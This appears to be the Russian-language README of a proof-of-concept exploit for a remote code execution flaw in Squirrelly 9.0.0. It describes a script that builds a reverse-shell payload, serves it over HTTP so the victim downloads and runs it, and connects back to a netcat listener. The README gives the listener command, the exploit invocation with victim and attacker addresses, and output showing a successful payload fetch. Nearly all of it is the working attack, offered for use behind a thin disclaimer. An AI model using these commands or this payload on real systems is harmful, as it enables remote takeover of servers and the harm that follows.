
CVE-2024-40453 - Squirrelly v9.0.0 RCE. Poc
Этот скрипт предназначен только для образовательных целей.
Не используйте его в незаконных целях.
Если вы это сделаете, это полностью ваша ответственность; я не несу ответственности за любое неправомерное использование.
Этот скрипт создает обратную оболочку с именем payload.sh в текущем каталоге.
Затем он запускает HTTP-сервер на порту 80, чтобы жертва могла скачать payload.sh.
На машине атакующего необходимо запустить прослушиватель (listener).
HTTP-сервер завершается через 3 секунды, чтобы жертва могла скачать и выполнить payload.sh.
На основе следующей информации был разработан этот POC. https://samuzora.com/posts/cve-2024-40453
Запустите свой прослушиватель
rlwrap nc -nvlp 3000
Выполните полезную нагрузку
# python3 poc.py -rhost <VICTIM_IP> -rport <VICTIM_PORT> -lhost <ATTACKER_IP> -lport <ATTACKER_LISTENER_PORT>
python3 poc.py -rhost 172.16.0.2 -rport 3000 -lhost 172.16.0.1 -lport 3000
[+] Payload created at payload.sh
[*] Hosting HTTP server on port 80
[*] Triggering remote execution
172.16.0.2 - - [13/Jun/2025 22:21:10] "GET /payload.sh HTTP/1.1" 200 -
[*] Shutting down HTTP server on port 80
[!] Check your listener!